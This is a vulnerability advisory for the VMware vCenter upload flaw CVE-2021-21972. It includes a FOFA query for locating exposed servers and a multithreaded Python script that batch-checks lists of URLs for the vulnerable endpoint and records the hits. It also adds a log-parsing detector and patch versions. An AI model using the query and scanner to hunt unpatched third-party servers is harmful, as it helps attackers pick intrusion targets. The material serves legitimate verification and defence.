About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)

Background

CVE-2021-21972 is an unauthenticated remote code execution vulnerability in VMware vCenter Server. Through the exposed vROps plugin endpoint, an attacker without credentials can upload a file such as a webshell to any location on the vCenter server and then execute it.

Affected versions

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

Vulnerability reproduction: FOFA query

Syntax: title="+ ID_VC_Welcome +"

POC

https://xxxx/ui/vropspluginui/rest/services/uploadova

An unauthenticated GET to this path on a vulnerable vCenter returns HTTP 405 (Method Not Allowed), which shows that the upload endpoint is reachable without a login; this is the fingerprint the script below checks for.

The https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC script can be used for batch verification:

# -*- coding: utf-8 -*-
import argparse
import http.client
import random
from concurrent.futures import ThreadPoolExecutor

import requests
import urllib3

banner = """
    888888ba dP
    88 `8b 88
    a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
    88 `8b. 88' `88 88 Y8ooooo. 88 88
    88 .88 88. .88 88 88 88. .88
    88888888P `88888P8 dP `88888P' `88888P'
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu
 """
print(banner)

# vCenter appliances commonly present self-signed certificates; silence the warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Force HTTP/1.0 for the check request (the original author's setting).
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

# Unauthenticated vROps plugin endpoint; a 405 to a GET means it is exposed.
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
OUTPUT_FILE = "vulnerability address.txt"

# Optional proxy, e.g. {"http": "socks5://127.0.0.1:1081", "https": "socks5://127.0.0.1:1081"}
# (socks5 needs PySocks). The original used a misspelled "scoks5" key, which requests
# silently ignored, so no proxy was ever applied; None keeps that effective behaviour.
PROXIES = None


def get_ua():
  """Build a random Chrome-like User-Agent string."""
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
  return ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])


def CVE_2021_21972(url):
  """Check one vCenter base URL; HTTP 405 from GET uploadova marks it as vulnerable."""
  headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
  }
  targetUrl = url.rstrip('/') + TARGET_URI
  try:
    res = requests.get(targetUrl, headers=headers, timeout=15,
                       verify=False, proxies=PROXIES)
    if res.status_code == 405:
      print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
      with open(OUTPUT_FILE, 'a') as fw:
        fw.write(url + '\n')
    else:
      print("[-] " + url + " No CVE-2021-21972 vulnerability was found.\n")
  except Exception as e:
    print("[-] " + url + " Request ERROR: " + str(e) + "\n")


def multithreading(filename, pools=5):
  """Run the check over a file of URLs (one per line) with a thread pool.

  Uses the standard-library ThreadPoolExecutor instead of the third-party
  threadpool package the original depended on.
  """
  with open(filename, "r") as f:
    urls = [line.strip() for line in f if line.strip()]
  with ThreadPoolExecutor(max_workers=pools) as executor:
    executor.map(CVE_2021_21972, urls)


def main():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
  parser.add_argument("-f", "--file", help="Url File; Example:url.txt")
  args = parser.parse_args()
  if args.url is not None and args.file is None:
    CVE_2021_21972(args.url)
  elif args.url is None and args.file is not None:
    multithreading(args.file, 10)  # 10 worker threads
  else:
    parser.print_help()


if __name__ == "__main__":
  main()
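As an added, defender-side example that is not part of the article or the linked repository: the following Python scans web-server access-log lines for requests to the uploadova endpoint, labelling GET requests answered with 405 as scanner probes (the same fingerprint the script above relies on) and POSTs as upload attempts. The combined access-log format and the sample lines are assumptions constructed for this example.

```python
import re
from collections import Counter

# Endpoint of the vulnerable vROps plugin servlet named in the article.
UPLOADOVA_PATH = "/ui/vropspluginui/rest/services/uploadova"

# Assumption: Apache/Tomcat "combined" access-log layout (see constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Feb/2021:10:15:01 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 405 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.1234.56 Safari/537.36"
203.0.113.10 - - [24/Feb/2021:10:15:03 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
198.51.100.7 - - [24/Feb/2021:10:16:00 +0000] "GET /ui/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [24/Feb/2021:10:17:30 +0000] "GET /ui/vropspluginui/rest/services/uploadova?x=1 HTTP/1.1" 405 0 "-" "curl/7.68.0"
"""

def classify(method, status):
    """Label a hit on the endpoint the way a responder would triage it."""
    if method == "GET" and status == 405:
        return "probe"            # scanner fingerprint used by the article's script
    if method == "POST":
        return "upload_attempt"   # a request body was sent to the upload servlet
    return "other"

def scan_access_log(lines):
    """Return one finding per request that reached the uploadova endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the sweep
        path = m.group("path").split("?", 1)[0].rstrip("/")
        if path != UPLOADOVA_PATH:
            continue
        status = int(m.group("status"))
        findings.append({
            "ip": m.group("ip"), "ts": m.group("ts"),
            "method": m.group("method"), "status": status,
            "kind": classify(m.group("method"), status),
        })
    return findings

def summarize(findings):
    """Count finding kinds and list the source addresses involved."""
    return Counter(f["kind"] for f in findings), sorted({f["ip"] for f in findings})
```

Running `summarize(scan_access_log(SAMPLE_LOG.splitlines()))` on the constructed sample yields two probes and one upload attempt from two source addresses, which is the pattern worth alerting on while the patch is being applied.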

Repair suggestions

Upgrade vCenter Server 7.0 to 7.0 U1c
Upgrade vCenter Server 6.7 to 6.7 U3l
Upgrade vCenter Server 6.5 to 6.5 U3n
